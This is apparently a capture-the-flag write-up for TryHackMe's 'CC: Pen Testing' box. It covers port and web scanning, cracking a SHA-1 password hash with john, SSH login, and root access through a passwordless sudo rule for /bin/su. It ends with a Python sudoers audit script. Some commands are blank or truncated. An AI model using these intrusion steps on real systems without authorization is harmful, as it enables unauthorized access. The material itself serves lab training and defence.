THM: Crash Course Pen Testing

Write-up for the final challenge of the CC: Pen Testing room at TryHackMe



Basic Information

Type: Regular Box
Name: Try Hack Me / CC: Pen Testing
Author: Asentinn / OkabeRintaro


  1. Basic Information
  2. Recon
  3. Cracking user password
  4. Elevating privileges
  5. Additional readings



Recon

Target IP is - I'm assigning that to a variable for ease of use.

$ IP=

Scanning for open ports

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out


Then prepare the input for searchsploit:

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-


Firing up nikto and ffuf for practice:

$ nikto -h $IP -o nikto-$IP.txt


$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$

The ffuf command can be a little complicated, so let me explain it a bit:

  • -w: wordlist for fuzzing
  • -u: target URL
  • -recursion, -recursion-depth: when ffuf finds a directory, it starts another scan of it after the current one has finished (you will recognize it by the Job [1/X] label)
  • -e: a useful one, it also looks for files with the listed extensions. Be careful with it though, as it multiplies the amount of work by N, where N is the number of extensions (because for each wordlist entry it tries appending these extensions).
  • -v: shows the full URL of each finding (useful when using the -recursion flag)
  • -of: output format; ffuf output files are not the easiest to read, and I chose Markdown for now
  • -o: and this is just a name for the output file; $IP will resolve variable name and the result



Cracking user password

Both tools found the /secret/ directory, and ffuf further tracked down /secret/secret.txt.

$ curl


This is definitely the hash of the user's password. I will be using john to crack it, and it could be run blindly on that file, but let's use the hash-identifier that comes with Kali to see the output, just out of curiosity.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8


As we can see, it is a SHA-1 hash. Now cracking it with john:

$ john -format=Raw-SHA1 secret.txt


That was really fast (don't ever use such weak passwords, of course). So we've got the credentials nyan/nyan. Try logging in with these over SSH.

$ ssh nyan@$IP


We're in. I'm getting the user flag.

nyan@ubuntu:~$ cat user.txt


Elevating privileges


User nyan can run /bin/su as root without specifying a password.

And just by seeing this sudoers entry we know that nyan can execute the sudo command.

Otherwise, when running sudo -l, we would see "Sorry, user nyan may not run sudo on ubuntu" (where ubuntu is the host name).

We've got root! So cat out that flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt
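
From the defending side, a rule like the one on this box (passwordless /bin/su as root) is exactly what a sudoers review should flag. The following is an added example, not part of the original write-up: a small Python audit that handles tag persistence across a command list. The SHELL_EQUIVALENT set, the function name and the sample rules are assumptions made for illustration.

```python
import re

# Illustrative, not exhaustive: binaries that hand over a root shell when run through sudo.
SHELL_EQUIVALENT = {"su", "sudo", "sh", "bash", "dash", "zsh", "env", "vi", "vim", "less", "find"}

# user host = (runas) command-list; one Runas spec per rule, no alias expansion.
RULE = re.compile(r"^(?P<who>\S+)\s+[^=\s]+\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG = re.compile(r"([A-Z_]+):\s*")

def audit_sudoers(text):
    """Return (line_number, user, command) for passwordless rules that yield a root shell."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")) or line.split()[0].endswith("_Alias"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        # An omitted Runas spec means root; "(user:group)" keeps only the user part.
        runas = m.group("runas")
        users = ["root"] if runas is None else [u.strip() for u in runas.split(":")[0].split(",")]
        as_root = any(u in ("root", "ALL") for u in users)
        nopasswd = False
        for item in m.group("rest").split(","):
            item = item.strip()
            # NOPASSWD: stays in force for later commands until PASSWD: resets it.
            tag = TAG.match(item)
            while tag:
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                item = item[tag.end():]
                tag = TAG.match(item)
            binary = item.split()[0] if item else ""
            name = binary.rsplit("/", 1)[-1]
            if as_root and nopasswd and (binary == "ALL" or name in SHELL_EQUIVALENT):
                findings.append((lineno, m.group("who"), binary))
    return findings

# Constructed sample rules, not copied from the target box.
SAMPLE = """\
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
nyan    ALL=(root) NOPASSWD: /bin/su
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /bin/bash
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: /bin/su
"""

if __name__ == "__main__":
    for lineno, user, cmd in audit_sudoers(SAMPLE):
        print(f"line {lineno}: {user} may run {cmd} as root without a password")
```

The deploy rule is flagged because NOPASSWD: carries over to /bin/bash, while the backup rule is not, since PASSWD: restores the password prompt before /bin/su.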
